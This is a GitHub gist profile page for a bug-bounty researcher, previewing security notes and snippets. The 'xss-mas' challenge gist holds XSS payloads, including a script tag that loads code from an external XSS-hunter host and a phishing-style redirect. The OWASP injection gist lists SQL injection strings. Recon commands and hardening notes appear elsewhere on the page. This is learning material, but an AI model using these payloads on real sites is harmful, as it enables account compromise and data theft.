Skip to content

Instantly share code, notes, and snippets.

View ruevaughn's full-sized avatar

Chase Jensen ruevaughn

69 followers · 263 following
View GitHub Profile
@ruevaughn
ruevaughn / 12 Days of xss-mas
Last active June 20, 2021 20:24
12 days of xss-mas challenges lutions to the XSS challenge here https://www.youtube.com/watch?v=d84SP5r6n9c&t=824s
1. A phising page to try and fool me
<script>
window.location='example.com'
</script>
2. two viral vids
<script src=me2.xss.ht></script>
document.body.innerHTML='<iframe src=https://youtube.com/embed/dQw4w9WgXcQ?autoplay=1allow=autoplay</iframe>
</script>
@ruevaughn
ruevaughn / gist:db6a77f8e15a87b5e2e5f9580b532fb5
Created June 26, 2021 22:33
Input Sanitization Snippets
const unsafeCharacters = ["&", "`", "\"", "{", "}", "(", ")", "[", "]", "=", ",", "+"];
function sanitize(str) {
str += "";
for (let char of unsafeCharacters) {
str = str.replaceAll(char, `&#x${char.codePointAt().toString(0x10)};`);
}
return str;
}
@ruevaughn
ruevaughn / tools
Last active October 8, 2021 14:17
Recon portion of my approach to bug bounties. It's a WIP
find . -type f -name "*.body"
find . -type f -name "*.body" | html-tool tags title | vim -
ggrep -Hrni ""
ggrep -hri ""
%! sort -u --version-sort
onaws domain.com
subfinder -d dommain.com | dnsx -req
@ruevaughn
ruevaughn / harden-linux
Last active October 15, 2021 10:06
https://feross.org/how-to-setup-your-linode/
notepad c:\windows\system32\drivers\etc\hosts
Measure TCP handshake and SSL exchange time - Perform a test of how much time it takes to perform both the TCP
curl -kso /dev/null -w "tcp:%{time_connect}, ssldone:%{time_appconnect}\n" https://linuxsecurity.expert/
scp ~/.ssh/id_rsa.pub <your username>@<your server ip>:
mkdir .ssh
@ruevaughn
ruevaughn / todo
Created June 28, 2021 07:12
https://learn.pranjalsinghal.in/bug-bounty/
https://m0chan.github.io/2019/12/17/Bug-Bounty-Cheetsheet.html
https://brutelogic.com.br/blog/xss-via-http-headers/
https://brutelogic.com.br/lab/header.php
https://brutelogic.com.br/blog/the-7-main-xss-cases-everyone-should-know/
https://brutelogic.com.br/gym.php
https://amzn.to/3r8B8am
@ruevaughn
ruevaughn / a1-injection
Last active August 21, 2021 04:51
OWASP Top 10 - Injection-https://owasp.org/www-project-top-ten/2017/A1_2017-Injection
query = "SELECT * FROM users WHERE name='" + user + "' AND password='" + password + "'";
SELECT * FROM users WHERE name='jane' AND password='x' OR '1'='1';
- MySQL, MSSQL, Oracle, PostgreSQL, SQLite:
OWASP TOP 10 2013-2021 #1 Vulnerability: Injection
# SQLinjection
' OR '1'='1' -- ' OR '1'='1' /*
' UNION SELECT 'admin' AS password# Password = admin
@ruevaughn
ruevaughn / InsecureBankV2.tutorial.md
Last active September 27, 2024 09:29
InsecureBankV2 Android App Walkthrough

InsecureBankV2 Tutorial

This is a writeup of my solutions to the intentionally vulnerable Android app. wsIf you want to solve the challenge yourself, you can download the APK from here. In most cases I recommend trying the challenge yourself first before reading the solution. If you are new to testing Android Applications or Vulnerability Assessing in general, you may gain more out of it by reading and then attempting. Do what works for you.

Setup

Follow my Blog Post for instructions on setting up this lab or follow the instructions here. First we are going to cover the tools utilized and how to set them up, then I am going to cover the vulnerabilites found in this App.

@ruevaughn
ruevaughn / apis
Last active August 22, 2021 08:14
curl -H "Authorization: token $GH_TOKEN" -H "Accept: application/vnd.github.v3+json" https://api.github.com/user/orgs
@ruevaughn
ruevaughn / happybday.css
Last active September 11, 2021 04:25
https://codepen.io/strangerintheq/details/dyRogLO
body {
margin: 0;
overflow: hidden;
}
a {
position: fixed;
display: inline-block;
margin-left: calc(50vw - 70px);
font-size:20px;
@ruevaughn
ruevaughn / logger.js
Last active September 11, 2021 04:24
export const LogLevels = {
log : 0,
info : 1,
warn : 2,
error : 3
}
function clone(arr) {
return arr.map(a => JSON.parse(JSON.stringify(a)))
}